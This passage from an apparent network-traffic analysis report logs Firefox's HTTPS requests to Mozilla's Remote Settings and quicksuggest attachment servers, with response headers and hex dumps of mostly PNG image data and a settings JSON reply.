3e 19 ec 00 dc 91 9b 87 3b 6a 01 23 27 0d 8e 49 c3 5c 8f 95 ee 70 1b af de 25 5c bf 73 7f 75 70 d8 32 b8 Data Ascii: WD] zSVq!hnohz]UEO=y`G[Zqt^sdTx_XPQIHgw;}~MXE)DsE2^~]Zj?5Z.&)'!Kgc4>;j#'I\p%\sup2
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 31 31 3f 8a 7b 05 5e 78 a5 7f b0 b1 b9 f5 94 a9 d3 bf 41 12 28 bc 7e 90 65 12 43 3e a5 7b 18 3b 3b fb 89 13 27 80 8a 20 ec 90 28 fd 3e e2 49 ec 6b d9 5e 5e 5b 7b f8 c4 69 69 65 55 31 39 45 75 43 63 a2 f4 2d a4 54 b5 c5 14 d5 f9 25 e5 f9 c4 a4 d9 b8 f8 67 ce 59 c0 34 65 06 c3 c4 c9 0b 58 d9 15 14 55 4d 89 0d a1 ac 1d 9c 35 0d 4d 54 75 8c 94 75 0c a5 55 34 e1 ef 01 06 6e 51 69 41 69 79 5e 71 69 21 19 39 5e 31 89 99 ac 6c 6a 7a 06 af de 7d a8 6b 6a 6e 6a 26 f6 a9 ee 01 47 07 11 02 2c a1 bf b1 b1 19 74 c2 c5 c5 05 43 d5 03 8c 06 3f a4 5f e9 68 7b 3e 50 97 11 4d 4c 8d 6b ea aa d3 b2 b2 9f c4 be d8 ba 6b 2f f8 0f 1e 01 21 5e 41 e1 9f 01 40 49 4d 9d 6d c9 52 fa 89 93 41 fa 97 6f df 0b 8a da a0 6d 6c ca cd c3 f7 d5 e8 34 72 97 06 52 23 6c 1c b1 48 4b 07 39 1d 46 Data Ascii: 11?{^xA(~eC>{;;' (>Ik^^[{iieU19EuCc-T%gY4eXUM5MTuuU4nQiAiy^qi!9^1ljz}kjnj&G,tC?_h{>PMLkk/!^A@IMmRAoml4rR#lHK9F
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 10 94 92 59 c4 23 38 7f 09 8f 88 b4 a2 a4 9c 0a eb 22 4e 02 1d 13 a9 e9 00 b9 74 82 b4 dc c2 91 28 3a e9 62 d8 56 b5 d8 11 03 fa 38 62 9b 68 1c dd e4 69 b3 c4 65 94 00 06 08 30 20 74 b0 30 90 be a8 9c 32 78 39 61 59 79 08 0c 1c 40 57 04 85 37 6f df 55 d7 d4 8a 6c d4 d4 d5 d3 0e 58 f4 f4 41 9a 12 1f 1f bf 64 c9 92 61 86 3e d2 d9 82 ff 79 11 1f 57 53 57 1b ff e6 35 04 00 e0 90 04 06 26 60 07 90 07 50 3a 38 8c 0a c0 57 d6 68 10 c3 00 44 36 4f 1f 7f 88 5a 0b 16 f3 64 97 54 ef 3e 72 52 cf d8 cc c2 76 05 32 ef 0c 3f d8 02 11 4b ec cc 84 d2 67 48 20 e7 ce 9d 7f fe fc 45 94 e4 80 d0 7b 88 af 90 4c f8 06 86 88 49 cb 43 56 0b 56 af a6 ad 0f fe 47 52 4e 11 1e 9b 9d 8b 07 e8 1a bf b0 98 80 b0 18 3d c3 44 ea 86 79 7f 53 30 f9 2e 62 47 bd 5a 84 b0 78 29 2f e8 10 24 a8 Data Ascii: Y#8"Nt(:bV8bhie0 t02x9aYy@W7oUlXAda>yWSW5&`P:8WhD6OZdT>rRv2?KgH E{LICVVGRN=DyS0.bGZx)/$
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: ea c6 ad 3b c0 a1 1b 59 da e4 96 56 ec 3a 74 14 28 fc be c3 c7 d0 60 fb e2 d5 6b db 15 8e c0 2b 40 fa dc 82 10 60 05 21 09 84 34 04 47 c7 38 a4 2b 39 d5 05 65 b2 f8 60 1a 41 55 30 1c c7 05 07 54 dd df 07 fb 98 22 d8 e3 08 38 1a 2c 65 93 12 b4 09 12 92 d3 11 68 18 27 02 5b 03 0c 20 7d 11 97 96 5b ca c7 bf 90 63 b1 ff 9a a0 f2 ea 1a 48 2d 9b 5b 5b ca 2b 2b 8a 4a 8a d3 32 d2 9f c5 3e 9f 3c 7d 06 18 ba b2 ba 06 a4 e2 e4 7e f8 bf e6 32 c9 f1 0a 7f ea dc 79 48 9d 20 63 ba 7c f7 fe b3 b7 09 36 ce 6e 89 69 19 35 8d 2d 41 e1 91 d2 0a ca cb 44 25 c0 cf 2c e1 e6 5b b0 68 31 e3 24 66 e4 01 90 0a 14 e1 db 8b b6 ff 66 9d fe b8 59 c0 90 81 0f f2 39 7c 01 29 b1 0b 1e c9 67 12 e8 40 ac 7f cd 99 cb b7 0c 28 92 8c 94 9c 3c 3b 27 97 84 8c ec f1 d3 67 40 05 41 f1 b3 73 73 c0 Data Ascii: ;YV:t(`k+@`!4G8+9e`AU0T"8,eh'[ }[cH-[[++J2><}~2yH c\|6ni5-AD%,[h1$ffY9\|)g@(<;'g@Ass

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	64251	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/25043d3b-9aeb-4f57-a7da-874ab81697bd HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	737	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nNm2x3Dc-0JWLX1rHfdMLOSLKNMPjock8-ljiYfDfrR6GBtG9nbXtv0MP8jrL8KQDOEa9LpYiPyug x-goog-generation: 1678716163338318 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 8987 x-goog-meta-goog-reserved-file-mtime: 1654282193 x-goog-hash: crc32c=vr5ZZg== x-goog-hash: md5=A/70GYmjnV2pkcv5V1Q3Fg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 8987 Server: UploadServer Date: Fri, 26 Jul 2024 03:43:07 GMT Cache-Control: public,max-age=604800 Age: 52076 Last-Modified: Mon, 13 Mar 2023 14:02:43 GMT ETag: "03fef41989a39d5da991cbf957543716" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	653	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 22 b0 49 44 41 54 78 5e ed 7c 09 b8 5e 65 75 ee bb a7 7f 3a f3 94 9c 8c 24 90 81 40 06 42 18 cb 50 10 94 68 55 8a 10 a1 d0 ab ad 2d b6 52 9f da 16 b1 7a 6d d1 32 69 55 9e db d6 a2 a5 45 45 a4 45 06 83 53 05 ab 5e 87 80 81 10 c6 90 08 24 90 90 f1 e4 24 39 39 f3 3f ec e9 be ef b7 cf c1 0c 27 e5 40 62 9f dc 67 ef 75 b2 cf ff ff fb df fb 1b d6 7a d7 5a ef fa be 7d 62 c5 14 64 92 5a b1 47 5e 33 49 a9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 00 48 b9 64 Data Ascii: PNGIHDR>asRGBgAMAapHYsod"IDATx^\|^eu:$@BPhU-Rzm2iUEEES^$$99?'@bguzZ}bdZG^3IdHdHdHdHdHdHdHdHdHd
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 4e e0 08 ca b8 d7 01 fc c8 67 4d 4e 62 c6 6a 4c 54 cd 0e 63 04 ae 05 97 d4 3d b0 6c d8 2c d1 ac 6a 05 61 b9 0c 87 af 51 18 90 ae 47 2c da 48 e2 58 b4 3b 9e 0b bb 50 82 5d 57 47 22 67 23 64 b7 0e db 30 ed d5 42 c4 39 97 65 5f 84 de fe 18 67 de fc 0a 36 ed 29 1b c2 67 c7 3e 22 3f c0 c7 97 4e c5 df 5d 36 01 b6 c3 16 59 1e 4a 2c e2 b7 ea c7 18 ac 46 18 66 1b 35 b5 c7 f1 08 d5 45 0f 68 28 3a a8 2b b0 ef 98 63 89 6d 15 90 3c 40 72 59 63 55 91 63 5b 21 cf 73 36 41 0d 70 f2 c6 46 16 db 0e e2 0a 1c db e5 07 cf b0 10 2b 8e 78 cd 10 c2 68 90 37 57 39 57 de a7 96 84 4a 5e 13 d9 79 d8 6e 09 96 d3 48 c2 6a b3 49 f5 27 b5 52 4f 16 2b 17 63 7c e9 83 83 e2 1c c1 f9 47 d2 97 c5 52 87 df 5a 6c 63 3c 92 98 8a 63 e1 8f 45 5b c4 6c cb 22 59 4e da e7 79 92 65 a3 19 fe 8a 68 af Data Ascii: NgMNbjLTc=l,jaQG,HX;P]WG"g#d0B9e_g6)g>"?N]6YJ,Ff5Eh(:+cm<@rYcUc[!s6ApF+xh7W9WJ^ynHjI'RO+c\|GRZlc<cE[l"YNyeh
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: ba 85 e3 54 44 50 44 1a c4 cc a6 77 e1 dd 4b be 84 a2 5b c7 2b 05 4f 02 57 e9 fa 8d 70 00 9d 12 5a f6 7d 95 97 45 83 83 34 fe 0d 28 af 5c 81 82 a2 a2 d6 eb 99 5b e2 98 b9 f9 c4 13 51 58 f6 56 e4 97 9c 82 7c e7 14 02 2f 21 5c 09 fe e8 a5 dd bb 51 5b f3 02 fa bf f7 1d e0 f1 d5 20 6b 33 9e 14 a0 4c 20 14 51 ff 5b a7 a1 fe d3 d7 a3 cf ad c7 59 37 12 00 bd 15 43 3a 7d b3 02 48 cf 44 85 91 98 b9 d4 23 d8 68 ac b3 e7 d4 e3 03 e7 b5 e2 8c 99 2e d1 9e 87 63 b6 07 e9 5d bc 67 c7 40 15 4f 6e aa e0 ab 8f 0e 62 c5 b3 bd e8 27 39 92 f1 a5 90 48 29 88 29 e5 ea 0b 5a 71 eb e5 93 51 72 99 1b f9 7d 2d 1a 40 bc ea 2a 04 5d 3f 44 5c a0 97 33 bd 3b 0a f5 0c f9 e1 84 b3 e1 ce fa 04 bc d6 f9 0c 4a 13 a4 6b 03 0e 63 32 79 7d a5 1b f1 9e 1f 61 e8 c5 ff 83 7c df 9a c4 20 8a 12 74 Data Ascii: TDPDwK[+OWpZ}E4(\[QXV\|/!\Q[ k3L Q[Y7C:}HD#h.c]g@Onb'9H))ZqQr}-@*]?D\3;Jkc2y}a\| t
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 89 5e 3e b7 e9 3d 04 6f 3d 87 4d ce 42 1d da 24 9a b5 ca 10 1e 5b ff cf a8 c6 24 94 c6 e9 d8 8e 22 e3 58 46 64 1f 2f ed 7c 98 20 d8 66 da cf b9 4a a1 ec 87 1c 6c d1 e4 65 c8 91 4b e9 1a ce 3c b9 7e 1c 72 10 00 d4 6d a0 81 50 f9 11 3d 48 cf e9 45 7b f6 20 78 75 0b cd c0 0e 39 40 99 85 23 85 75 c5 a5 66 05 2c d0 6a 1b eb 5b 6d d3 4a 55 82 c0 7e 87 14 c3 3c 65 6a 68 5e 17 b9 1e e2 f6 16 0c 4f 9a 8a 1a 4b c5 80 8a b2 2d e5 62 0f d5 2d db 50 eb e9 21 ca b4 05 cc 94 a2 68 4a 72 33 b3 25 c2 92 63 4b 26 84 87 a6 16 66 c3 1c bd 58 b5 c9 cb 8c 02 62 ec 16 15 a0 95 42 05 d0 1c 4f e9 33 fd 0a 0b 3b 2d cc 9e 52 24 40 15 57 12 90 d8 6c ff c5 ed 65 f4 95 59 46 99 c8 25 00 73 be 46 81 24 9b 8c 3a 2e af 77 c9 f6 ad de e7 60 ed f8 3e ec 4d 5f 45 f8 f2 3f 21 58 ff 05 1e b7 Data Ascii: ^>=o=MB$[$"XFd/\| fJleK<~rmP=HE{ xu9@#uf,j[mJU~<ejh^OK-b-P!hJr3%cK&fXbBO3;-R$@WleYF%sF$:.w`>M_E?!X
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 3c a1 75 6f 8b de d9 f8 85 cf a1 b8 60 9e 21 2d 5a 6d 72 78 5e 1c e0 a0 14 c0 2e a8 57 bd 31 40 52 fb a6 7c e1 d5 8e bc 85 e5 9c 21 66 9c f8 9e e1 08 67 7d 49 6b f7 bd f0 c8 ba 03 b6 19 d2 60 ef 3e b9 84 7b ae 9e 46 83 b1 0f 2a 40 bb 5f e3 11 91 58 19 db 67 9f 7f f4 6f 3b 70 f7 ea 01 b6 cb f3 54 38 82 3a 74 34 fb f8 c9 45 1f c7 ac da 43 a6 82 b1 54 96 32 e4 d7 18 91 ac a6 c5 28 1e c3 ba be f3 77 e9 ba 2a 23 25 1a a9 44 73 35 5a e2 91 94 80 66 5b bc b2 13 e5 5f 9c 05 b7 bc 35 b9 9e 73 52 05 e4 8e 70 00 6d 06 29 6e 6e dd fb 24 96 3f f9 01 0c 46 7b d9 92 d6 54 48 ec c8 3f 66 75 5c 88 77 2d fa 32 0a 4c 85 aa 08 62 96 8d bf 7c f1 8b 58 f9 2a 89 27 3d 52 bb 8a 8a b8 25 af 0d 57 b0 6c 9d 50 9c c5 4e 18 d5 04 0a 03 18 31 11 46 a8 11 27 7d 3d 19 53 8b c6 18 ec 48 Data Ascii: <uo`!-Zmrx^.W1@R\|!fg}Ik`>{F@_Xgo;pT8:t4ECT2(w#%Ds5Zf[_5sRpm)nn$?F{TH?fu\w-2Lb\|X*'=R%WlPN1F'}=SH
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: b3 1f 83 55 dd c3 d2 d5 a7 62 f5 bd 40 43 b8 b1 5b 43 e8 78 9d d9 d5 14 00 d8 9a 7c a5 b5 ee 38 1c 3f f9 3d 9c ab 2a 01 91 63 82 8e 7a 7a 79 d7 0a 3c b9 e1 0e 5e 26 43 f3 72 01 8c df 1f db fe 56 34 15 8f e1 dc c9 3b d8 4c 7c 98 39 60 4c 00 68 a2 26 d7 f1 d7 6b db 8a a5 12 0a d7 bc 1f d6 31 33 e0 d0 58 62 b6 fa 4b dd a0 e6 a3 fc 83 ef a1 ef 53 37 a1 b6 6a 25 fc 7e 7a 9a 56 d4 a8 34 56 f9 54 16 2f d4 20 19 7e 6b 1b 37 61 e0 b6 af c2 bf e3 6e b8 95 3e b9 27 d3 07 eb 69 ce c4 22 79 cc 7f e8 8f 98 0e 1d 04 be 56 b3 a8 78 a9 51 28 a1 42 45 9c 6c ab 01 db 86 ca f8 f0 37 76 e3 2f ef df 84 a7 b6 95 d1 af 47 83 68 11 79 93 16 4d b4 78 d5 5f f1 b1 66 6b 05 7f fb 60 17 ae be ab 1b af ec a1 12 f5 24 0f c7 15 33 b5 68 eb 74 e9 ec 3c ae 3a 93 c6 29 ce 66 ca 59 64 76 0b Data Ascii: Ub@C[Cx\|8?=*czzy<^&CrV4;L\|9`Lh&k13XbKS7j%~zV4VT/ ~k7an>'i"yVxQ(BEl7v/GhyMx_fk`$3ht<:)fYdv
2024-07-26 18:11:03 UTC	1384	IN	Data Raw: f0 86 77 f1 ba 21 2a be 46 90 91 7b 13 dc be d6 f1 dd 26 de d6 01 b4 9d 8a 5c e7 65 e6 d5 72 8a 82 13 9c de 67 d9 c6 83 6c db a5 9e c8 03 b4 4f 52 7f 1c ec c9 97 c1 e3 bd 8a 3b fb 8a 22 8d fe 46 a0 b7 b2 03 f7 3c 76 09 7a aa 9b 39 4e 25 5c 0a c7 da 58 9c 80 cb 16 df 43 9e 70 3c 9d 8b e3 96 2d 78 bd 4a 47 f1 9e 84 25 be 39 19 37 00 c6 14 7a 96 79 44 9a 86 b6 ab f4 d8 be 1e f8 03 03 64 f1 55 ea 95 35 b1 f1 5e 2a 35 cf 01 e6 08 02 ed 17 b4 b4 c1 2d 96 a8 6b e5 df 03 42 e1 88 e8 36 89 78 73 c2 bd a5 20 11 d2 e4 bc 44 4f d3 28 42 f7 95 03 74 93 17 ec 1d d6 ae a1 fe 37 11 06 fb 9c 4d 00 c4 68 ab b3 30 a1 ce 43 89 e5 1e f1 65 e4 90 65 9c d1 6a 68 8c a1 08 12 47 bd 08 e8 b5 a8 95 e9 a0 3d 0c 6e 43 fc 5e 8f a1 11 44 cc c1 96 db 0a 4b 00 f0 1a 08 1e a6 00 ad e6 bd Data Ascii: w!F{&\erglOR;"F<vz9N%\XCp<-xJG%97zyDdU5^5-kB6xs DO(Bt7Mh0CeejhG=nC^DK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	64257	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	334	OUT	GET /main-workspace/quicksuggest/a960129b-64a7-439d-a8e6-f8d201e0b44e HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840735361940 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5376 x-goog-hash: crc32c=lPNM9g== x-goog-hash: md5=YIkbH8DV6AuT8BrZXfNHhg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 5376 X-GUploader-UploadID: AHxI1nMUMsYpgCrX0jKfBykmQT6ytyHxf-6aMVbaDEc6tgExc8RykFynrLlol0cDOnKldggPnjxSFrHy9Q Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:35 GMT ETag: "60891b1fc0d5e80b93f01ad95df34786" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 c6 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDRL\pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 30 32 32 2d 30 36 2d 30 38 54 31 37 3a 35 31 3a 31 38 2d 30 34 3a 30 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 32 2d 30 36 2d 30 38 54 31 37 3a 35 31 3a 31 38 2d 30 34 3a 30 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 39 34 37 32 63 38 33 2d 31 32 35 65 2d 34 35 35 36 2d 62 61 62 38 2d 66 66 65 64 35 34 61 35 61 38 30 62 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f Data Ascii: 022-06-08T17:51:18-04:00" xmp:MetadataDate="2022-06-08T17:51:18-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:99472c83-125e-4556-bab8-ffed54a5a80b" xmpMM:DocumentID="adobe:docid:pho
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 13 13 f3 df ec 19 06 9e e7 2f 5f be 7c f1 e2 45 93 c9 d4 de de 3e 7b f6 ec 96 96 96 b9 73 e7 fa 0c 44 51 bc 74 e9 52 7d 7d 7d 5f 5f 5f 5b 5b 5b 7e 7e 7e 75 75 b5 74 c8 6a b5 16 14 14 8c 8e 8e aa d5 ea b8 b8 b8 e4 e4 64 9d 4e 57 50 50 90 94 94 34 2d 7d b3 d9 6c 4d 4d 4d 4d 4d 4d 66 b3 f9 c6 8d 1b 76 bb 5d a3 d1 bc f7 de 7b 2f bd f4 12 bc 82 88 a0 b2 b2 52 6e b6 74 e9 d2 b3 67 cf a2 8c 09 71 b9 5c 0e 87 c3 e3 f1 84 e2 a4 a3 a3 23 3b 3b 5b de b7 bc bc 3c b9 4f 9e e7 5f 79 e5 15 b9 c1 96 2d 5b 7c 47 bd 5e ef ab af be 0a 5e 87 5d bb 76 0d 0e 0e 86 d2 31 41 10 be fa ea 2b ad 56 ab f0 1c 15 15 75 ef de 3d 54 2d a4 00 dd dd dd 60 2f ab aa aa 82 e8 59 5f 5f df a1 43 87 8c 46 63 6a 6a 6a 72 72 f2 86 0d 1b de 7d f7 dd b6 b6 36 af d7 1b a8 ab e6 e6 e6 19 33 66 28 7a Data Ascii: /_\|E>{sDQtR}}}___[[[~~~uutjdNWPP4-}lMMMMMMfv]{/Rntgq\#;;[<O_y-[\|G^^]v1A+Vu=T-`/Y__CFcjjjrr}63f(z
2024-07-26 18:11:03 UTC	1390	IN	Data Raw: 0f 3e 08 1a a7 a5 a5 81 19 9b d0 05 10 45 f1 b5 d7 5e 43 69 80 22 26 26 26 88 e0 23 41 b4 22 96 97 97 07 2d 07 07 03 a3 a3 a3 d0 39 70 4e 4e 8e 3c ee 3f f6 d8 63 a0 cd d8 d8 58 6f 6f af a2 70 68 68 08 2c e4 38 ae b0 b0 10 cc 4b 4f 0b 9f 7c f2 49 a0 93 98 1f 7e f8 41 be 1c 14 10 44 02 e8 74 ba 88 88 08 b0 1c 0c 88 16 8b 65 7c 7c 1c b4 54 5c f1 f8 f8 78 e8 b3 0c a6 15 af 5c b9 02 ed d2 fa f5 eb 31 1d 0e 85 88 88 88 9a 9a 1a 72 fb 92 92 92 ac ac ac a0 9b 23 12 20 2a 2a 0a fa 1a a8 ab ab 73 b9 5c f2 92 86 86 06 d0 4c ab d5 c6 c7 c7 cb 4b a2 a3 a3 a1 6f cb 73 e7 ce 79 3c 1e 79 49 7d 7d 3d 68 16 19 19 09 8d 4b d3 45 46 46 06 f4 c5 03 12 1b 1b 7b f8 f0 61 e8 a0 8e 10 22 01 d4 6a f5 93 4f 3e 09 96 f7 f7 f7 cb 17 40 04 41 f8 e5 97 5f 40 33 bd 5e 1f 1d 1d 2d 2f 51 Data Ascii: >E^Ci"&&&#A"-9pNN<?cXoophh,8KO\|I~ADte\|\|T\x\1r# **s\LKosy<yI}}=hKEFF{a"jO>@A_@3^-/Q
2024-07-26 18:11:03 UTC	504	IN	Data Raw: 85 f2 fd f7 df 43 5d ad 5c b9 d2 ef d4 2c 48 01 f0 df 5f 58 2c 96 40 1d 3a 9d 4e c5 c2 bd 9c c3 87 0f 13 3a 81 0a f0 cf 3f ff 28 2c 51 c1 67 c1 82 05 01 7d 37 28 e1 f5 7a 51 03 93 0f 3f fc 10 5f 37 48 01 ee dc b9 83 1a 84 fd f8 e3 8f c1 f9 b4 5a ad f3 e6 cd 83 fa bc 7a f5 2a 89 07 a8 00 9b 36 6d 52 3c 3d 3c cf eb f5 7a b0 95 c5 8b 17 07 14 39 e5 b8 dd 6e d4 0b 19 1f 88 82 14 c0 e3 f1 80 a9 e9 d4 d4 d4 e0 f6 47 fa 18 1c 1c dc bc 79 b3 c2 ed cc 99 33 09 47 b4 0e 87 63 cd 9a 35 f2 ba 46 a3 11 fc fc fa d3 4f 3f 55 34 a1 52 a9 8a 8b 8b 7d 09 9f e0 98 9a 9a fa ee bb ef 12 12 12 14 ce 93 92 92 30 5f 3b a9 44 ec b2 27 86 33 67 ce 94 97 97 47 44 44 c4 c7 c7 27 26 26 a6 a7 a7 67 67 67 43 f7 6f 05 84 20 08 d2 9f 21 b8 75 eb 56 6f 6f ef f8 f8 78 4e 4e 4e 45 45 05 c9 Data Ascii: C]\,H_X,@:N:?(,Qg}7(zQ?_7HZz*6mR<=<z9nGy3Gc5FO?U4R}0_;D'3gGDD'&&gggCo !uVooxNNNEE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	64256	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:03 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:03 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2610 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:03 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:03 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	64259	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/437e6fa9-e584-4be9-8a1f-e4951809fd17 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
